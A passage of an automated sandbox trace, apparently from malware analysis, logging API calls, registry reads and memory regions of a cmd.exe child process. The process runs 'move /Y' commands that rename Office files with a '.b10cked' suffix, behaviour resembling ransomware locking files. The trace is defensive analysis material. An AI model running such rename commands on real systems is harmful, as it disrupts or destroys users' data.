returned 69 [0173.685] _wcsicmp 
(_String1="STINTL~1.TRX", _String2="..") returned 69 [0173.685] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl~1.trx")) returned 0x2020 [0173.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.685] SetErrorMode (uMode=0x0) returned 0x0 [0173.685] SetErrorMode (uMode=0x1) returned 0x0 [0173.686] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x12f18c, lpFilePart=0x12f174 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", lpFilePart=0x12f174*="STINTL~1.TRX") returned 0x3c [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.686] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0173.686] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl~1.trx")) returned 0x2020 [0173.686] SetErrorMode (uMode=0x0) returned 0x0 [0173.686] SetErrorMode (uMode=0x1) returned 0x0 [0173.686] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x12f608, lpFilePart=0x12f3a0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", lpFilePart=0x12f3a0*="STINTL~1.TRX") returned 0x3c [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] SetErrorMode (uMode=0x0) returned 0x0 [0173.686] SetErrorMode (uMode=0x1) returned 0x0 [0173.686] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f810, lpFilePart=0x12f3a0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x12f3a0*="STINTL.DLL.trx_dll.b10cked") returned 0x4a [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] SetLastError (dwErrCode=0x0) [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.687] GetLastError () returned 0x2 [0173.687] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x12ed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed1c) returned 0x1b2128 [0173.687] FindNextFileW (in: hFindFile=0x1b2128, lpFindFileData=0x12ed1c | out: lpFindFileData=0x12ed1c) returned 0 [0173.687] GetLastError () returned 0x12 [0173.687] FindClose (in: hFindFile=0x1b2128 | out: hFindFile=0x1b2128) returned 1 [0173.689] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1b1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1cb8) returned 0x1b2128 [0173.689] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12efb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0173.689] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x12efb4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0173.689] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll")) returned 0x2020 [0173.689] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.690] FindClose (in: hFindFile=0x1b2128 | out: hFindFile=0x1b2128) returned 1 [0173.690] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12ef68 | out: _Buffer=" 1") returned 9 [0173.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.690] GetFileType (hFile=0x7) returned 0x2 [0173.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eef4 | out: lpMode=0x12eef4) returned 1 [0173.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.856] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ef28 | out: lpConsoleScreenBufferInfo=0x12ef28) returned 1 [0173.856] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.857] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ef68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.857] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x12ef4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ef4c*=0x1a) returned 1 [0173.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.857] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.857] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.857] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.857] SetConsoleInputExeNameW () returned 0x1 [0173.857] GetConsoleOutputCP () returned 0x1b5 [0173.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.857] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.858] exit (_Code=0) Process: id = "304" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23658 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23659 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23660 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23661 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23662 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23663 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23664 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23665 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23666 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 23667 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23790 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23791 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23792 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23793 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 23794 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 23795 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23796 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23797 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23798 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23799 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23800 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23801 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23802 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23803 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23804 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23805 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23806 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23807 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23808 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23809 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23810 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23811 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 23812 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 23813 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011a0000" filename = "" Thread: id = 405 os_tid = 0xaf4 [0173.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcdc | out: lpSystemTimeAsFileTime=0x26fcdc*(dwLowDateTime=0x9d6f9020, dwHighDateTime=0x1d440a9)) [0173.713] GetCurrentProcessId () returned 0xa60 [0173.713] GetCurrentThreadId () returned 0xaf4 [0173.713] GetTickCount () returned 0x32902 [0173.713] QueryPerformanceCounter (in: lpPerformanceCount=0x26fcd4 | out: lpPerformanceCount=0x26fcd4*=23050192536) returned 1 [0173.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.713] __set_app_type (_Type=0x1) [0173.714] __p__fmode () returned 0x76b331f4 [0173.714] __p__commode () returned 0x76b331fc [0173.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.714] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.714] GetCurrentThreadId () returned 0xaf4 [0173.714] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf4) returned 0x38 [0173.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.714] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fc6c | out: phkResult=0x26fc6c*=0x0) returned 0x2 [0173.714] VirtualQuery (in: lpAddress=0x26fca3, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.714] VirtualQuery (in: 
lpAddress=0x170000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.715] GetConsoleOutputCP () returned 0x1b5 [0173.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.715] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.716] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.716] GetEnvironmentStringsW () returned 0x3a0210* [0173.716] 
FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.716] GetEnvironmentStringsW () returned 0x3a0210* [0173.716] FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebdc | out: phkResult=0x26ebdc*=0x40) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0xa0, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x0, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, 
lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegCloseKey (hKey=0x40) returned 0x0 [0173.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebdc | out: phkResult=0x26ebdc*=0x40) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x0, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] 
RegCloseKey (hKey=0x40) returned 0x0 [0173.717] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.717] srand (_Seed=0x5b886389) [0173.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" [0173.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" [0173.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.718] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.718] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.718] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.718] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0173.718] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.718] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.718] GetEnvironmentStringsW () returned 0x3a2360* [0173.718] FreeEnvironmentStringsW (penv=0x3a2360) returned 1 [0173.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.719] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.719] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.719] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f9a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f9a8, lpFilePart=0x26f9a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f9a4*="Desktop") returned 0x18 [0173.719] 